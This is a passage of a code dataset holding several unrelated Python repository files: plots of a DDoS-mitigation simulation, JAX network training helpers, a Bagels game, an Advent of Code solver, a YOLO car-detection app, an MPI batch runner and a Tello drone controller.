scaled2 = np.array([_.sum(axis=axis) for _ in split])\n if transpose: scaled2 = scaled2.T\n return scaled2, bins2\n\n def plot_heatmap(axis, grid, vmin=None, vmax=None, colorbar=False, colorbar_label=None):\n scaled_grid, ybins = scale(grid, steps + 1, 0)\n scaled_grid, _ = scale(scaled_grid, 200, 1)\n if squash:\n # squash values together for clearer visuals (e.g. for reflector-botnet switch)\n scaled_grid = np.sqrt(scaled_grid, out=np.zeros_like(scaled_grid, dtype=np.float))\n vmin = vmin if vmin is not None else scaled_grid.min()\n vmax = vmax if vmax is not None else scaled_grid.max()\n mesh = axis.pcolormesh(ybins, np.arange(200) / 2, scaled_grid, cmap='gist_heat_r', shading='nearest', vmin=vmin,\n vmax=vmax)\n\n axis.set_yticks(np.arange(0, 101, 50))\n axis.set_yticklabels(['0', '$2^{15}$', '$2^{16}$'])\n axis.set_xticks(np.arange(0, ybins.max() + 1, 100))\n axis.tick_params(labelsize=labelsize)\n if colorbar:\n cb = fig.colorbar(mesh, ax=axis, use_gridspec=True, pad=0.01)\n cb.set_label('Data rate' if colorbar_label is None else colorbar_label, fontsize=labelsize)\n cb.ax.tick_params(labelsize=labelsize)\n\n return vmin, vmax\n\n scaled_grid, ybins = scale(rate_grid, steps + 1, 0)\n scaled_grid, _ = scale(scaled_grid, 200, 1, True)\n if squash:\n # squash values together for clearer visuals (e.g. for reflector-botnet switch)\n scaled_grid = np.sqrt(scaled_grid, out=np.zeros_like(scaled_grid, dtype=np.float))\n vmin = scaled_grid.min()\n vmax = scaled_grid.max()\n\n if hhh_grid is not None:\n ax2.set_title('Applied filter rules', fontsize=titlesize)\n ax2.set_ylabel('Address space', fontsize=labelsize)\n ax2.set_xlabel('Time index', fontsize=labelsize)\n plot_heatmap(ax2, hhh_grid, colorbar=True, colorbar_label='HHH frequency')\n else:\n ax2.set_title('Combined data rate', fontsize=titlesize)\n ax2.set_ylabel('Address space', fontsize=labelsize)\n ax2.set_xlabel('Time index', fontsize=labelsize)\n vmin, vmax = plot_heatmap(ax2, rate_grid, colorbar=True)\n\n ax1.set_title('Attack data rate', fontsize=titlesize)\n ax1.set_ylabel('Address space', fontsize=labelsize)\n ax1.set_xlabel('Time index', fontsize=labelsize)\n plot_heatmap(ax1, attack_grid, vmin, vmax, colorbar=True)\n\n ax0.set_title('Benign data rate', fontsize=titlesize)\n ax0.set_ylabel('Address space', fontsize=labelsize)\n ax0.set_xlabel('Time index', fontsize=labelsize)\n plot_heatmap(ax0, benign_grid, vmin, vmax, colorbar=True)\n\n if pattern_id is not None:\n add_vspan_to(ax0, get_vspan_spec_for(pattern=pattern_id), True, use_time_index=True)\n add_vspan_to(ax1, get_vspan_spec_for(pattern=pattern_id), False, use_time_index=True)\n add_vspan_to(ax2, get_vspan_spec_for(pattern=pattern_id), False, use_time_index=True)\n for ax in [ax0, ax1, ax2]:\n ax.set_xlim(left=0)\n plt.tight_layout()\n plt.show()\n\n fig = plt.figure()\n gs = mgrid.GridSpec(1, 1)\n\n ax0 = fig.add_subplot(gs[0, :])\n\n ax0.set_xlabel('Time index', fontsize=labelsize)\n ax0.set_ylabel('Data rate', fontsize=labelsize)\n x = range(benign_grid.shape[0])\n benign_y = benign_grid.sum(axis=1)\n attack_y = benign_y + attack_grid.sum(axis=1)\n ax0.fill_between(x, 0, benign_y, facecolor=benign_color, label='Benign traffic')\n ax0.fill_between(x, benign_y, attack_y, facecolor=attack_color, label='Attack traffic')\n ax0.tick_params(labelsize=labelsize)\n ax0.set_ylim(bottom=0)\n ax0.set_xlim(left=0, right=x[-1] + 1)\n if pattern_id is not None:\n add_vspan_to(ax0, get_vspan_spec_for(pattern=pattern_id), True, use_time_index=True)\n\n plt.legend(loc='upper 
left')\n plt.subplots_adjust(wspace=.5, hspace=.5)\n plt.tight_layout()\n plt.show()\n\n\ndef load_numpy(filename):\n with gzip.GzipFile(filename, 'r') as f:\n return np.load(f)\n\n\ndef load_tracesampler(flow_file, rate_grid_file, attack_grid_file):\n return TraceSampler.load(load_numpy(flow_file), load_numpy(rate_grid_file),\n load_numpy(attack_grid_file))\n\n\ndef render_blacklist_history(blacklist_file, maxtime, maxaddr):\n with open(blacklist_file, 'r') as f:\n episode_blacklist = json.load(f)\n hhhgrid = np.zeros((maxtime, maxaddr + 1))\n for time_index in range(len(episode_blacklist)):\n hhhs = [HHHEntry.from_dict(_) for _ in sorted(episode_blacklist[time_index],\n key=lambda x: x['len'], reverse=True)]\n print(f'======== TIME IDX {time_index} ========')\n print(f'number of rules={len(hhhs)}')\n # if len(hhhs) == 1:\n for r in sorted(hhhs, key=lambda h: h.id):\n print(f'{str(IPv4Address(r.id)).rjust(15)}/{r.len} {r.lo, r.hi}')\n render_hhhs(hhhs, hhhgrid, time_index)\n return hhhgrid\n\n\ndef main():\n visualize(None, None, None, None, True, 10, .0001, 599)\n\n\ndef visualize(flow_file, rate_grid_file, attack_grid_file, blacklist_file, nohhh, interval, epsilon, steps, phi=None,\n l=None, trace_id=None):\n if flow_file is None:\n trace = scenario\n fgs = trace.get_flow_group_samplers()\n trace_sampler = TraceSampler(fgs, steps)\n trace_sampler.init_flows()\n else:\n trace_sampler = load_tracesampler(flow_file, rate_grid_file,\n attack_grid_file)\n if blacklist_file:\n hhh_grid = render_blacklist_history(blacklist_file,\n trace_sampler.rate_grid.shape[0], trace_sampler.maxaddr)\n elif not nohhh:\n print('Calculating HHHs...')\n hhh_grid = playthrough(trace_sampler, epsilon, phi, l, interval)\n else:\n hhh_grid = None\n plot(steps, phi, l, trace_sampler.flows, trace_sampler.rate_grid,\n trace_sampler.attack_grid, hhh_grid, squash=True,\n pattern_id=trace.get_rate_pattern_id(0) if trace_id is None else trace_id)\n\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n pass\n","repo_name":"malluce/rl-ddos","sub_path":"plotting/flowgen/scenario_vis.py","file_name":"scenario_vis.py","file_ext":"py","file_size_in_byte":10782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12269456591","text":"\"\"\"\nThis file contains methods used to load data and train example network models.\n\nWilkie Olin-Ammentorp, 2022\nUniversity of Califonia, San Diego\n\"\"\"\n\nimport haiku as hk\nimport jax\nimport jax.numpy as jnp\n\nimport optax\nimport tensorflow_datasets as tfds\n\nfrom FHRR.modules import *\nfrom FHRR.utils import *\nfrom tqdm import tqdm\nfrom functools import reduce\n\n#\n# Data functions\n#\n\ndef load_dataset(dataset_name: str,\n split: str,\n *,\n is_training: bool,\n batch_size: int,\n repeat: bool = True):\n \"\"\"Loads the dataset as a generator of batches.\"\"\"\n\n\n ds = tfds.load(dataset_name, data_dir=\"~/data\", split=split).cache()\n if repeat:\n ds = ds.repeat()\n if is_training:\n ds = ds.shuffle(10 * batch_size, seed=0)\n ds = ds.batch(batch_size)\n\n x_full, y_full = tfds.as_numpy(tfds.load(dataset_name, \n split=[split], \n data_dir=\"~/data\",\n shuffle_files=True,\n as_supervised=True,\n batch_size=-1,\n with_info=False))[0]\n\n return iter(tfds.as_numpy(ds)), x_full, y_full\n\ndef scale_mnist(images):\n \"\"\"Convert int8 based values to normalized floats\"\"\"\n return jnp.divide(images, 255)\n\n#\n# Model functions\n#\n\n\ndef accuracy(net, key, params, images, labels, **kwargs):\n 
\"\"\"\n Compute classification accuracy given a model, parameters, and dataset.\n \"\"\"\n\n yhat = net.apply(params, key, images, **kwargs)\n yhat = jnp.argmax(yhat, axis=1)\n return yhat == labels\n\n\ndef update_params(model: hk.Transformed, \n key,\n trainable_params: hk.Params = None, \n non_trainable_params: hk.Params = None, \n loss_fn = None, \n data = None, \n optimizer = None, \n opt_state = None, \n **kwargs):\n \"\"\"\n Training loop update step. \n \"\"\"\n\n #separate the image and label data from the batch\n xd = data['image']\n yd = data['label']\n\n #lambda function to compute loss \n batch_loss = lambda tp, ntp: jnp.mean(loss_fn(\n model.apply(hk.data_structures.merge(tp, ntp), key, xd, is_training=True, **kwargs),\n yd))\n\n #compute the loss value and gradients\n loss_value = batch_loss(trainable_params, non_trainable_params)\n gradients = jax.grad(batch_loss)(trainable_params, non_trainable_params)\n \n #compute trainable parameter updates using the optimizer\n updates, opt_state = optimizer.update(gradients, opt_state)\n new_trainable_params = optax.apply_updates(trainable_params, updates)\n \n return new_trainable_params, opt_state, loss_value\n\ndef train_model(model, \n key,\n params = None,\n optimizer = None,\n dataset = None,\n loss_fn = None,\n batches: int = None,\n loss_history = None,\n opt_state = None,\n non_trainable_params = [\"codebook\", \"static_projection\", \"classification_query\"],\n **kwargs):\n \"\"\"\n Main training loop for reducing loss for a model on a dataset.\n \"\"\"\n\n #separate the trainable and non-trainable model parameters - non-trainable parameters are passed\n # via the non_trainable_params arg above\n trainable_params, non_trainable_params = hk.data_structures.partition(\n #return false for each of the non-trainable parameters in the model\n lambda m, n, v: bool(reduce(lambda a,b: a*b, [name not in m for name in non_trainable_params])),\n params\n )\n\n #if there is no loss history to append to (first run)\n if loss_history == None:\n loss_history = []\n\n #if there is no previous optimizer state (first run or stateless optimizer)\n if opt_state == None:\n opt_state = optimizer.init(trainable_params)\n\n \n #lambda calls parameters, batch, and optimizer state\n update_fn = lambda train_params, nontrain_params, batch, opt_state: update_params(\n model, \n key, \n trainable_params = train_params, \n non_trainable_params = nontrain_params, \n loss_fn = loss_fn, \n data = batch, \n optimizer = optimizer, \n opt_state = opt_state, \n **kwargs)\n\n #main optimizer loop\n for i in tqdm(range(batches)):\n batch = next(dataset)\n #call the update lambda\n trainable_params, opt_state, loss_val = update_fn(trainable_params, \n non_trainable_params, \n batch, \n opt_state)\n\n #append the loss value\n loss_history.append(loss_val)\n\n #merge the parameters back together\n new_params = hk.data_structures.merge(trainable_params, non_trainable_params)\n\n return new_params, loss_history\n\n","repo_name":"wilkieolin/FHRR_networks","sub_path":"FHRR/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":5194,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"11147613655","text":"import random\n\ndef getClue(secretNumber, guess):\n clue = ''\n for number in range(3):\n if guess[number] in secretNumber and secretNumber[number] != guess[number]:\n clue += 'Fermi '\n elif secretNumber[number] == guess[number]:\n clue += 'Pico '\n if clue == '':\n clue += 'Bagels '\n 
return clue\n\nwhile True:\n secretNumber = ''\n for i in range(3):\n secretNumber += str(random.randint(0, 9))\n attempts = 1\n print('''I am thinking of a 3-digit number. Try to guess what it is.\nThe clues I give are...\nWhen I say: That means:\nBagels None of the digits is correct.\nPico One digit is correct but in the wrong position.\nFermi One digit is correct and in the right position.\nI have thought of a number. You have 10 guesses.''')\n while True:\n if attempts > 10:\n print('You lost!')\n print('The secret number was ' + str(secretNumber))\n break\n while True:\n print('Guess #' + str(attempts))\n guess = str(input())\n if guess[0] == 0:\n guess2 = guess[1:]\n else:\n guess2 = guess\n try:\n guess3 = int(guess2)\n except:\n continue\n if len(guess) == 3:\n break\n if guess == secretNumber:\n print('You won!')\n break\n print(getClue(secretNumber, guess))\n attempts += 1\n \n","repo_name":"Straw17/games","sub_path":"Bagels.py","file_name":"Bagels.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"12780701855","text":"# ======================================================================\n# Arithmetic Logic Unit\n# Advent of Code 2021 Day 24 -- Eric Wastl -- https://adventofcode.com\n#\n# Python implementation by Dr. Dean Earl Wright III\n# ======================================================================\n\n# ======================================================================\n# m o n a d . p y\n# ======================================================================\n\"A solver for the Advent of Code 2021 Day 24 puzzle\"\n\n# ----------------------------------------------------------------------\n# import\n# ----------------------------------------------------------------------\nimport alu\n\n# ----------------------------------------------------------------------\n# constants\n# ----------------------------------------------------------------------\nCONSTANTS = [4, 5, 15]\nNUM_LOOP = 14\nLEN_LOOP = 18\nDIGITS = [1, 2, 3, 4, 5, 6, 7, 8, 9]\nSTIGID = [9, 8, 7, 6, 5, 4, 3, 2, 1]\n\n# ======================================================================\n# Monad\n# ======================================================================\n\n\nclass Monad(object): # pylint: disable=R0902, R0205\n \"Object for Arithmetic Logic Unit\"\n\n def __init__(self, text=None, part2=False, inp=None):\n\n # 1. Set the initial values\n self.part2 = part2\n self.text = text\n self.alu = None\n self.constants = []\n\n # 2. Process text (if any)\n if text is not None and len(text) > 0:\n self.alu = alu.Alu(text=text, part2=part2, inp=inp)\n for offset in CONSTANTS:\n constants = []\n for loop in range(NUM_LOOP):\n index = loop * LEN_LOOP + offset\n value = self.alu.inst[index][2]\n constants.append(value)\n self.constants.append(constants)\n\n def block(self, which, digit, z_reg):\n \"Execute a single digit block\"\n\n # 1. Keep all previous digits or lose one\n z_1_26 = z_reg // self.constants[0][which]\n\n # 2. Do we match the adjusted last digit?\n if digit == z_reg % 26 + self.constants[1][which]:\n return z_1_26\n\n # 3. Else push the digit on the stack\n return 26 * z_1_26 + digit + self.constants[2][which]\n\n def run(self, digits):\n \"Run the entire program block by block\"\n\n # 1. Precondition axioms\n assert len(digits) == NUM_LOOP\n\n # 2. Start with nothing\n result = 0\n\n # 3. For for all the digits\n for index, digit in enumerate(digits):\n\n # 4. 
Execute the block\n result = self.block(index, int(digit), result)\n\n # 5. Return the final result\n return result\n\n def unblock(self, which, digit, z_reg):\n \"Reverse a block of code to get possible previous z values\"\n\n # 1. Start with nothing\n result = []\n\n # 2. Reconstruct the x register\n x_reg = z_reg - digit - self.constants[2][which]\n if x_reg % 26 == 0:\n result.append(x_reg // 26 * self.constants[0][which])\n\n # 3. Reconstruct the z register\n if 0 <= digit - self.constants[1][which] < 26:\n z_prev = z_reg * self.constants[0][which]\n result.append(digit - self.constants[1][which] + z_prev)\n\n # 4. Return the possible previous z values\n return result\n\n def unrun(self, digits=None):\n \"Solve the puzzle by executing the blocks in reverse order\"\n\n # 1. Have to start somewhere\n result = {}\n previous = set([0])\n\n # 2. Loop backwards through the blocks\n for which in range(13, -1, -1):\n\n # 3. Collect some z's [Sleep, I remember sleep]\n z_set = set()\n\n # 4. Loop for all of the digits and previous z's\n for digit in digits:\n\n # 5. Loop for all prevopus z's\n for z_reg in previous:\n\n # 6. Undo this block with these inputs\n z_possible = self.unblock(which, digit, z_reg)\n\n # 7. Add all the possible z's to the set\n for z_pos in z_possible:\n z_set.add(z_pos)\n if z_reg in result:\n z_pos_digits = [digit]\n z_pos_digits.extend(result[z_reg])\n result[z_pos] = z_pos_digits\n else:\n result[z_pos] = [digit]\n\n # 8. Update previous\n previous = z_set\n\n # 9. Return the digits\n return ''.join([str(_) for _ in result[0]])\n\n def part_one(self, verbose=False, limit=0):\n \"Returns the solution for part one\"\n\n # 0. Precondition axioms\n assert verbose in [True, False]\n assert limit >= 0\n\n # 1. Return the solution for part one\n return self.unrun(digits=DIGITS)\n\n def part_two(self, verbose=False, limit=0):\n \"Returns the solution for part two\"\n\n # 0. Precondition axioms\n assert verbose in [True, False]\n assert limit >= 0\n\n # 1. Return the solution for part two\n return self.unrun(digits=STIGID)\n\n\n# ----------------------------------------------------------------------\n# module initialization\n# ----------------------------------------------------------------------\nif __name__ == '__main__':\n pass\n\n# ======================================================================\n# end m o n a d . p y end\n# ======================================================================\n","repo_name":"deanearlwright/AdventOfCode","sub_path":"2021/24_ArithmeticLogicUnit/monad.py","file_name":"monad.py","file_ext":"py","file_size_in_byte":5912,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"13088429824","text":"import streamlit as st\nimport torch\nimport PIL \nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torchvision\n\n\ndef get_yolo_detection():\n \n st.markdown('''
    A Tesla vehicle detection app. You will be able to identify:
    CyberTruck, Model3, ModelS, ModelX, ModelY and Roadster
    ''',\n unsafe_allow_html=True)\n\n\n model = torch.hub.load('ultralytics/yolov5', 'custom', path='our_models/best.pt')\n img_file = st.file_uploader('Choose photo', type=['png', 'jpg', 'jpeg'], accept_multiple_files=False)\n \n \n if img_file:\n img = PIL.Image.open(img_file)\n results = model(img)\n fig, ax = plt.subplots()\n plt.axis('off')\n ax.imshow(results.render()[0])\n st.pyplot(fig)\n","repo_name":"abidgaidarov/cv_project","sub_path":"detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72014994338","text":"import logging as log\nimport os\nfrom mpi4py import MPI\nfrom datetime import datetime\nimport time\nimport json\n\n\nstart_time = time.time()\n\n# Initialize MPI\ncomm = MPI.COMM_WORLD\nsize = comm.Get_size()\nrank = comm.Get_rank()\n\n\n# set up logging to output to cwd /data\n# log debug messages to file\n# info message to console\ncwd = os.getcwd()\nlog_path = os.path.join(cwd, \"./log/\")\nos.makedirs(log_path, exist_ok=True)\n\ndata_path = os.path.join(cwd, \"./data/\")\nos.makedirs(data_path, exist_ok=True)\n\n# Get the current date as a string in the format 'YYYY-MM-DD'\ncurrent_date = datetime.now().strftime(\"%Y-%m-%d\")\n\n# Create a date folder in the data directory\ndate_data_path = os.path.join(data_path, current_date)\nos.makedirs(date_data_path, exist_ok=True)\n\n# Create model and agent folders inside the date folder\nos.makedirs(os.path.join(date_data_path, \"model/\"), exist_ok=True)\nos.makedirs(os.path.join(date_data_path, \"agent/\"), exist_ok=True)\nos.makedirs(os.path.join(date_data_path, \"model_end/\"), exist_ok=True)\n\n\nfrom resistance_cascade.model import ResistanceCascade\nfrom mesa.batchrunner import FixedBatchRunner\nfrom itertools import product\n\nlog.basicConfig(filename=f\"{cwd}/log/batch.log\", level=log.DEBUG)\n\n# parameters that will remain constant\nfixed_parameters = {\"multiple_agents_per_cell\": True, \"threshold\": 2.94444}\n\n# parameters that will vary load from json file\nwith open(\"resistance_cascade/batch_run_params.json\", \"r\") as f:\n params = json.load(f)\n\n# Helper function to generate all possible combinations of parameters\ndef dict_product(dicts):\n \"\"\"\n >>> list(dict_product(dict(number=[1,2], character='ab')))\n [{'character': 'a', 'number': 1},\n {'character': 'a', 'number': 2},\n {'character': 'b', 'number': 1},\n {'character': 'b', 'number': 2}]\n \"\"\"\n return (dict(zip(dicts, x)) for x in product(*dicts.values()))\n\n\n# Helper function to divide the parameter list into blocks\ndef chunks(lst, chunk_size):\n return [lst[i : i + chunk_size] for i in range(0, len(lst), chunk_size)]\n\n\n# set up the reporters\nmodel_reporters = {\n \"Seed\": lambda m: m.report_seed(m),\n \"Citizen Count\": lambda m: m.count_citizen(m),\n \"Active Count\": lambda m: m.count_active(m),\n \"Oppose Count\": lambda m: m.count_oppose(m),\n \"Support Count\": lambda m: m.count_support(m),\n \"Speed of Spread\": lambda m: m.speed_of_spread(m),\n \"Security Density\": lambda m: m.report_security_density(m),\n \"Private Preference\": lambda m: m.report_private_preference(m),\n \"Epsilon\": lambda m: m.report_epsilon(m),\n \"Threshold\": lambda m: m.report_threshold(m),\n \"Revolution\": lambda m: m.report_revolution(m),\n}\n\nagent_reporters = {\n \"pos\": \"pos\",\n \"condition\": \"condition\",\n \"opinion\": \"opinion\",\n \"activation\": \"activation\",\n \"private_preference\": 
\"private_preference\",\n \"epsilon\": \"epsilon\",\n \"oppose_threshold\": \"oppose_threshold\",\n \"active_threshold\": \"active_threshold\",\n \"jail_sentence\": \"jail_sentence\",\n \"actives_in_vision\": \"actives_in_vision\",\n \"opposed_in_vision\": \"opposed_in_vision\",\n \"support_in_vision\": \"support_in_vision\",\n \"security_in_vision\": \"security_in_vision\",\n \"perception\": \"perception\",\n \"arrest_prob\": \"arrest_prob\",\n \"active_level\": \"active_level\",\n \"oppose_level\": \"oppose_level\",\n \"flip\": \"flip\",\n \"ever_flipped\": \"ever_flipped\",\n \"model_seed\": \"dc_seed\",\n \"model_security_density\": \"dc_security_density\",\n \"model_private_preference\": \"dc_private_preference\",\n \"model_epsilon\": \"dc_epsilon\",\n \"model_threshold\": \"dc_threshold\",\n}\n\n# Generate the list of all possible parameter combinations\nall_parameters_list = list(dict_product(params))\n\n# For use if the batch run is interrupted, checks all filenames and cross-references with the parameter list\nfolder_path = \"data/2023-04-25/model/\"\n\nif os.path.exists(folder_path):\n filenames = os.listdir(folder_path)\nelse:\n filenames = None\n\n# Filter out parameter combinations that already have a corresponding file\ndef file_exists(param_dict):\n filename = f\"model_seed_{param_dict['seed']}_pp_{param_dict['private_preference_distribution_mean']}_sd{param_dict['security_density']}_ep_{param_dict['epsilon']}_th{fixed_parameters['threshold']}.parquet\"\n return os.path.exists(os.path.join(folder_path, filename))\n\nif filenames:\n filtered_parameters_list = [param_dict for param_dict in all_parameters_list if not file_exists(param_dict)]\nelse:\n filtered_parameters_list = all_parameters_list\n\n# Divide the parameter list into blocks of 20\nblock_size = 10\nparameter_blocks = chunks(filtered_parameters_list, block_size)\nmax_steps = 500\n# Initialize the dynamic load balancing\nif rank == 0: # If it's the master rank\n log.info(\"Starting batch run\")\n print(f\"Number of parameter combinations: {len(filtered_parameters_list)}\")\n log.info(f\"Number of parameter combinations: {len(filtered_parameters_list)}\")\n print(f\"Number of blocks: {len(parameter_blocks)}\")\n log.info(f\"Number of blocks: {len(parameter_blocks)}\")\n\n next_block_index = 0\n received_blocks = 0 # Add a counter for received blocks\n\n for i in range(1, size): # Assign an initial block to each worker rank\n if next_block_index < len(parameter_blocks):\n comm.send(\n (parameter_blocks[next_block_index], next_block_index), dest=i, tag=100\n )\n next_block_index += 1\n else:\n comm.send((\"DONE\", -1), dest=i, tag=100)\n\n # Receive the results from the worker ranks and write them to CSV files\n while received_blocks < len(parameter_blocks): # Change the loop condition\n data = comm.recv(source=MPI.ANY_SOURCE, tag=200)\n (\n rank_sender,\n block_num,\n # batch_end_model,\n batch_step_model_raw,\n batch_step_agent_raw,\n ) = data\n\n print(f\"Received block {block_num} from rank {rank_sender}\")\n log.info(f\"Received block {block_num} from rank {rank_sender}\")\n\n # batch_end_model.to_parquet(\n # f\"{date_data_path}/model_end/model_block_{block_num}_rank_{rank_sender}.parquet\"\n # )\n\n for key, df in batch_step_agent_raw.items():\n df.to_parquet(\n f\"{date_data_path}/agent/agent_seed_{key[0]}_pp_{key[1]}_sd{key[2]}_ep_{key[3]}_th{key[4]}.parquet\"\n )\n\n received_blocks += 1 # Increment the received blocks counter\n\n # Send a new block to the worker rank that just finished\n if next_block_index 
< len(parameter_blocks):\n            comm.send(\n                (parameter_blocks[next_block_index], next_block_index),\n                dest=rank_sender,\n                tag=100,\n            )\n            print(f\"Sent block {next_block_index} to rank {rank_sender}\")\n            log.info(f\"Sent block {next_block_index} to rank {rank_sender}\")\n            next_block_index += 1\n        else:\n            comm.send((\"DONE\", -1), dest=rank_sender, tag=100)\n        \n        for key, df in batch_step_model_raw.items():\n            df.to_parquet(\n                f\"{date_data_path}/model/model_seed_{key[0]}_pp_{key[1]}_sd{key[2]}_ep_{key[3]}_th{key[4]}.parquet\"\n            )\n\n\n\nelse: \n    while True:\n        # Receive a block of parameters from the master rank\n        block, block_num = comm.recv(source=0, tag=100)\n\n        if block == \"DONE\": \n            break\n\n        parameters_list = block\n        batch_run = FixedBatchRunner(\n            ResistanceCascade,\n            parameters_list,\n            fixed_parameters,\n            model_reporters=model_reporters,\n            agent_reporters=agent_reporters,\n            max_steps=max_steps,\n        )\n\n        batch_run.run_all()\n\n        # batch_end_model = batch_run.get_model_vars_dataframe()\n        batch_step_model_raw = batch_run.get_collector_model()\n        batch_step_agent_raw = batch_run.get_collector_agents()\n\n        # Send the results back to the master rank for writing\n        comm.send(\n            (\n                rank,\n                block_num,\n                # batch_end_model,\n                batch_step_model_raw,\n                batch_step_agent_raw,\n            ),\n            dest=0,\n            tag=200,\n        )\n\n# When all blocks have been processed, the master rank sends a \"DONE\" message to each worker rank\nif rank == 0:\n    for i in range(1, size):\n        comm.send((\"DONE\", -1), dest=i, tag=100)\n\nend_time = time.time()\ntime_taken = end_time - start_time\nprint(f\"Job completed in {time_taken} seconds.\")\nlog.info(f\"Job completed in {time_taken} seconds.\")\n","repo_name":"JoeHelbing/cascade","sub_path":"batch_run.py","file_name":"batch_run.py","file_ext":"py","file_size_in_byte":8581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"13638123253","text":"#2022 LockheedMartin Falcon Challenger\n#Team EML\n#github.com/blu-y/eml\n#-*- coding: utf-8 -*-\nimport cv2\nimport numpy as np\nimport pyzbar.pyzbar as pyzbar\nfrom djitellopy import tello\nimport time\nimport matplotlib.pyplot as plt\nimport torch\nimport pandas as pd\nimport os\nfrom os import path\nimport sys\nfrom math import log\n\n'''\nBasic commands\ndrone.move_up(50)\ndrone.send_control_command(\"down {}\".format(20))\ndrone.send_command_without_return(\"rc {} {} {} {}\".format(a,b,c,d))\n# a b c d : left-right, front-back, up-down, yaw (each -100~100)\n'''\n\nclass qr():\n    def __init__(self):\n        self.detector = cv2.QRCodeDetector()\n    def detect(self, img):\n        qrimg = np.copy(img)\n        qr_value = ''\n        for code in pyzbar.decode(qrimg):\n            qr_value = code.data.decode('utf-8')\n        if qr_value == '': qr_value, bbox, qrimg = self.detect_cv(qrimg)\n        #if qr_value != '': print('QR detected: ', qr_value)\n        return qr_value\n    def detect_cv(self, img):\n        qrimg = np.copy(img)\n        try:\n            value, bbox, _ = self.detector.detectAndDecode(img)\n            bbox = bbox.astype(int)\n            cv2.drawContours(qrimg, bbox, 0,(0,255,255), 3)\n            return value, bbox, qrimg\n        except: return '', '', qrimg\n\nclass YOLO():\n    def __init__(self, pt='best.pt'):\n        #self.model = torch.hub.load('ultralytics/yolov5', 'custom', path='yolo.pt', force_reload=False)\n        self.model = torch.hub.load('yolov5-master','custom',path=pt,source='local')\n        #self.model.cuda()\n    def detect_letter(self, img):\n        yolo = self.model(img)\n        df = yolo.pandas().xyxy[0]\n        img = yolo.render()[0]\n        if df.shape[0]>0:\n            ret = True\n            letter = df['name']\n            print('letter = \\n', letter)\n            letter = int(letter[0])
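\n        # no boxes detected in this frame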
\n        else: \n            ret = False\n            letter = None\n        return ret, letter, img\n    def detect_object(self, img):\n        yolo = self.model(img)\n        df = yolo.pandas().xyxy[0]\n        img = yolo.render()[0]\n        if df.shape[0]==0:\n            df = pd.DataFrame()\n        return df, img\n\nclass drone_tello():\n    def __init__(self, takeoff = 1, debug = 0):\n        '''\n        Tello drone initialize:\n        '''\n        self.tstart = time.time()\n        self.tello = tello.Tello()\n        self.tello.connect()\n        #self.tello.set_video_resolution(tello.Tello.RESOLUTION_480P)\n        self.tello.streamon()\n        print('battery: ', self.tello.get_battery(), '%\\n')\n        self.tello.send_command_without_return(\"rc {} {} {} {}\".format(0,0,0,0))\n        self.takeoff = takeoff\n        self.debug = debug\n        if self.takeoff == 1 : self.tello.takeoff()\n        self.qrd = qr()\n    def control(self, left=0, right=0, front=0, back=0, up=0, down=0, yaw=0):\n        #drone.send_command_without_return(\"rc {} {} {} {}\".format(a, b, c, d))\n        #a b c d : left-right, front-back, up-down, yaw (each -100~100)\n        if self.takeoff == 1: \n            self.tello.send_command_without_return(\"rc {} {} {} {}\".format(right-left, front-back, up-down, yaw))\n    def com(self, command):\n        if self.takeoff == 1: \n            self.tello.send_command_without_return(command)\n    def com_r(self, command):\n        if self.takeoff == 1: \n            return self.tello.send_control_command(command)\n    def control_r(self, left=0, right=0, front=0, back=0, up=0, down=0, yaw=0):\n        #drone.send_control_command(\"rc {} {} {} {}\".format(a, b, c, d))\n        #a b c d : left-right, front-back, up-down, yaw (each -100~100)\n        if self.takeoff == 1: \n            return self.tello.send_control_command(\"rc {} {} {} {}\".format(right-left, front-back, up-down, yaw))\n        else: return False\n    def get_frame(self):\n        self.frame_ = self.tello.get_frame_read().frame\n        self.frame = cv2.resize(self.frame_, (360, 240))\n        #self.frame = cv2.GaussianBlur(self.frame, (3,3), 1, 1)\n        return self.frame\n    def cw(self, d):\n        if self.takeoff == 1: return self.com(\"cw {}\".format(d))\n    def ccw(self, d):\n        if self.takeoff == 1: return self.com(\"ccw {}\".format(d))\n    def flip(self, s):\n        if self.takeoff == 1: return self.com_r(\"flip {}\".format(s))\n    def up(self, d):\n        if self.takeoff == 1: return self.tello.move_up(d)\n    def down(self, d):\n        if self.takeoff == 1: return self.tello.move_down(d)\n    def left(self, d):\n        if self.takeoff == 1: return self.tello.move_left(d)\n    def right(self, d):\n        if self.takeoff == 1: return self.tello.move_right(d)\n    def forward(self, d):\n        if self.takeoff == 1: return self.tello.move_forward(d)\n    def back(self, d):\n        if self.takeoff == 1: return self.tello.move_back(d)\n    def land(self):\n        if self.takeoff == 1: self.tello.land()\n        self.tend = time.time()\n        self.time = self.tend - self.tstart\n        print(f'Time : {self.time:.3f}')\n        print('battery: ', self.tello.get_battery(), '%\\n')\n        if self.debug == 1:\n            plt.figure('frame')\n            plt.imshow(self.frame)\n            plt.figure('original')\n            plt.imshow(self.frame_)\n            plt.figure('hsv')\n            plt.imshow(cv2.cvtColor(self.frame_, cv2.COLOR_BGR2HSV))\n            plt.show()\n    def qr(self, show = 1):\n        value = self.qrd.detect(self.frame_)\n        if value != '':\n            if show == 1: print('QR detected : ', value)\n        return value\n    def hw(self, show = 1):\n        value = self.hwd.detect(self.frame_)\n        if show == 1: print('Number detected : ', value)\n        return value\n\ndef clr_bin(img, clr, r=20, s=150, v=100):\n    hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n    img_h = hsv[:,:,0]\n    img_s = hsv[:,:,1]\n    img_v = hsv[:,:,2]\n    img_b_r = cv2.inRange(img_h, 180-r, 180)\n    img_b_r = img_b_r + cv2.inRange(img_h, 0, r)\n    img_b_r[img_v>v+40] = 0 # +40: allow brighter pixels for the red mask
